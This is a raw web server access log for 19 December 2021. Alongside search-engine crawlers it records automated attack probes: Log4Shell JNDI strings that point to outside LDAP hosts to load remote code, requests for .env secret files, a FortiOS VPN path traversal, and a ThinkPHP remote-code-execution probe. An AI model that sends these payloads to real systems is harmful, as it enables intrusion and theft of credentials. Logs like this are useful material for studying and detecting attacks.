35.89.28.98 - - [19/Dec/2021:01:32:32 +0100] "GET / HTTP/1.1" 301 295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 34.222.249.100 - - [19/Dec/2021:01:40:37 +0100] "GET / HTTP/1.1" 301 295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 185.220.101.133 - - [19/Dec/2021:01:50:16 +0100] "GET /?a=%24%7Bjndi%3Aldap%3A//193.3.19.159%3A53/c%7D HTTP/1.1" 400 374 "${jndi:ldap://193.3.19.159:53/c}" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 66.249.77.32 - - [19/Dec/2021:02:34:39 +0100] "GET /robots.txt HTTP/1.1" 301 304 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.77.32 - - [19/Dec/2021:02:34:40 +0100] "GET / HTTP/1.1" 301 297 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 8.134.210.94 - - [19/Dec/2021:02:57:47 +0100] "POST /_ignition/execute-solution HTTP/1.1" 301 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.8) Gecko/20100101 Firefox/60.8" 8.134.210.94 - - [19/Dec/2021:02:57:52 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.8) Gecko/20100101 Firefox/60.8" 8.134.210.94 - - [19/Dec/2021:02:57:56 +0100] "GET /script HTTP/1.1" 301 305 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.8) Gecko/20100101 Firefox/60.8" 8.134.210.94 - - [19/Dec/2021:02:58:07 +0100] "GET /login HTTP/1.1" 301 305 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.8) Gecko/20100101 Firefox/60.8" 8.134.210.94 - - [19/Dec/2021:02:58:10 +0100] "GET /jenkins/login HTTP/1.1" 301 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.8) Gecko/20100101 Firefox/60.8" 8.134.210.94 - - [19/Dec/2021:02:58:13 +0100] "GET /manager/html HTTP/1.1" 301 308 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.8) Gecko/20100101 Firefox/60.8" 8.134.210.94 - - [19/Dec/2021:02:58:18 +0100] "GET /wp-login.php HTTP/1.1" 301 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.8) Gecko/20100101 Firefox/60.8" 8.134.210.94 - - [19/Dec/2021:02:58:21 +0100] "GET /?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=vbjmzb15 HTTP/1.1" 301 385 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.8) Gecko/20100101 Firefox/60.8" 8.134.210.94 - - [19/Dec/2021:02:58:24 +0100] "GET /users/sign_in HTTP/1.1" 301 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.8) Gecko/20100101 Firefox/60.8" 109.237.103.38 - - [19/Dec/2021:04:05:35 +0100] "GET /.env HTTP/1.1" 301 304 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 109.237.103.38 - - [19/Dec/2021:04:05:36 +0100] "POST /.env HTTP/1.1" 301 304 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 128.1.248.26 - - [19/Dec/2021:04:21:53 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 131.220.6.152 - - [19/Dec/2021:04:58:32 +0100] "GET / HTTP/1.1" 301 295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 131.180.121.205 - - [19/Dec/2021:05:48:14 +0100] "-" 408 - "-" "-" 45.67.14.27 - - [19/Dec/2021:06:01:38 +0100] "POST /GponForm/diag_Form?style/ HTTP/1.1" 301 406 "-" "curl/7.3.2" 40.77.167.42 - - [19/Dec/2021:06:05:52 +0100] "GET / HTTP/1.1" 301 304 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 192.241.212.249 - - [19/Dec/2021:07:05:53 +0100] "GET /actuator/health HTTP/1.1" 301 310 "-" "Mozilla/5.0 zgrab/0.x" 64.62.197.2 - - [19/Dec/2021:07:29:07 +0100] "GET / HTTP/1.1" 301 383 "-" "-" 51.158.156.78 - - [19/Dec/2021:07:30:56 +0100] "GET /hmc/hybris HTTP/1.1" 301 393 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0" 142.93.100.250 - - [19/Dec/2021:07:47:55 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) Project-Resonance (http://project-resonance.com/) (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 192.241.214.65 - - [19/Dec/2021:08:59:26 +0100] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 301 348 "-" "Mozilla/5.0 zgrab/0.x" 192.241.212.100 - - [19/Dec/2021:09:07:50 +0100] "GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 301 335 "-" "Mozilla/5.0 zgrab/0.x" 193.118.53.194 - - [19/Dec/2021:09:43:50 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 35.195.93.98 - - [19/Dec/2021:11:59:55 +0100] "GET / HTTP/1.1" 301 301 "-" "python-requests/2.26.0" 192.241.207.72 - - [19/Dec/2021:12:10:46 +0100] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 301 348 "-" "Mozilla/5.0 zgrab/0.x" 192.241.212.246 - - [19/Dec/2021:12:13:13 +0100] "GET /owa/auth/logon.aspx HTTP/1.1" 301 314 "-" "Mozilla/5.0 zgrab/0.x" 192.241.212.10 - - [19/Dec/2021:12:14:09 +0100] "GET /owa/auth/x.js HTTP/1.1" 301 310 "-" "Mozilla/5.0 zgrab/0.x" 43.131.94.145 - - [19/Dec/2021:13:32:21 +0100] "GET / HTTP/1.1" 301 379 "-" "curl/7.64.1" 209.141.33.65 - - [19/Dec/2021:13:32:27 +0100] "GET / HTTP/1.1" 301 301 "-" "Chrome/54.0 (Windows NT 10.0)" 209.141.36.231 - - [19/Dec/2021:13:32:30 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36" 205.185.116.89 - - [19/Dec/2021:13:32:37 +0100] "GET /favicon.ico HTTP/1.1" 301 309 "-" "Chrome/54.0 (Windows NT 10.0)" 173.249.5.201 - - [19/Dec/2021:13:34:24 +0100] "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 301 452 "-" "Python-urllib/3.6" 192.241.207.185 - - [19/Dec/2021:14:23:08 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 zgrab/0.x" 173.212.209.24 - - [19/Dec/2021:16:06:37 +0100] "GET / HTTP/1.1" 301 300 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36 OPR/56.0.3051.52" 23.148.145.196 - - [19/Dec/2021:18:00:36 +0100] "GET /wp-login.php HTTP/1.1" 301 306 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763" 8.218.91.79 - - [19/Dec/2021:18:03:49 +0100] "GET / HTTP/1.0" 301 388 "-" "-" 8.218.91.79 - - [19/Dec/2021:18:03:55 +0100] "GET /text4041639933435 HTTP/1.1" 301 400 "-" "Mozilla/5.0 (compatible;)" 8.218.91.79 - - [19/Dec/2021:18:03:56 +0100] "GET /HNAP1 HTTP/1.1" 301 388 "-" "Mozilla/5.0 (compatible;)" 8.218.91.79 - - [19/Dec/2021:18:03:57 +0100] "POST /sdk HTTP/1.1" 301 386 "-" "Mozilla/5.0 (compatible;)" 8.218.91.79 - - [19/Dec/2021:18:03:57 +0100] "GET /evox/about HTTP/1.1" 301 393 "-" "Mozilla/5.0 (compatible;)" 8.218.91.79 - - [19/Dec/2021:18:03:57 +0100] "GET / HTTP/1.0" 301 388 "-" "-" 8.218.91.79 - - [19/Dec/2021:18:03:58 +0100] "GET / HTTP/1.1" 301 383 "-" "-" 8.218.91.79 - - [19/Dec/2021:18:04:19 +0100] "GET / HTTP/1.1" 301 301 "-" "-" 8.218.91.79 - - [19/Dec/2021:18:04:22 +0100] "GET /robots.txt HTTP/1.1" 301 308 "-" "curl/7.75.0" 131.180.121.205 - - [19/Dec/2021:19:26:58 +0100] "-" 408 - "-" "-" 40.77.167.42 - - [19/Dec/2021:19:43:09 +0100] "GET / HTTP/1.1" 301 304 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 106.75.169.79 - - [19/Dec/2021:19:53:41 +0100] "GET / HTTP/1.0" 301 383 "-" "-" 162.221.192.26 - - [19/Dec/2021:19:56:07 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 211.154.194.21 - - [19/Dec/2021:22:34:29 +0100] "GET /${jndi:ldap://5.101.118.127:1389/Exploit} HTTP/1.1" 301 428 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox" 211.154.194.21 - - [19/Dec/2021:22:34:30 +0100] "GET / HTTP/1.1" 301 383 "-" "${jndi:ldap://5.101.118.127:1389/Exploit}" 211.154.194.21 - - [19/Dec/2021:22:34:30 +0100] "GET /?v=${jndi:ldap://5.101.118.127:1389/Exploit} HTTP/1.1" 301 431 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox" 211.154.194.21 - - [19/Dec/2021:22:34:31 +0100] "GET /?id=${jndi:ldap://5.101.118.127:1389/Exploit} HTTP/1.1" 301 432 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox" 211.154.194.21 - - [19/Dec/2021:22:34:32 +0100] "GET /?page=${jndi:ldap://5.101.118.127:1389/Exploit} HTTP/1.1" 301 434 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox" 211.154.194.21 - - [19/Dec/2021:22:34:32 +0100] "GET /?s=${jndi:ldap://5.101.118.127:1389/Exploit} HTTP/1.1" 301 431 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox" 211.154.194.21 - - [19/Dec/2021:22:34:33 +0100] "POST /login HTTP/1.1" 301 388 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox" 211.154.194.21 - - [19/Dec/2021:22:34:34 +0100] "GET / HTTP/1.1" 301 383 "-" "curl/7.58.0" 211.154.194.21 - - [19/Dec/2021:22:34:34 +0100] "GET / HTTP/1.1" 301 383 "-" "curl/7.58.0" 211.154.194.21 - - [19/Dec/2021:22:34:35 +0100] "GET / HTTP/1.1" 301 383 "-" "curl/7.58.0" 211.154.194.21 - - [19/Dec/2021:22:34:36 +0100] "GET / HTTP/1.1" 301 383 "-" "curl/7.58.0" 128.14.209.162 - - [19/Dec/2021:22:38:01 +0100] "GET /owa/ HTTP/1.1" 301 304 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 23.146.241.20 - - [19/Dec/2021:22:55:12 +0100] "GET /wp-login.php HTTP/1.1" 301 306 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763"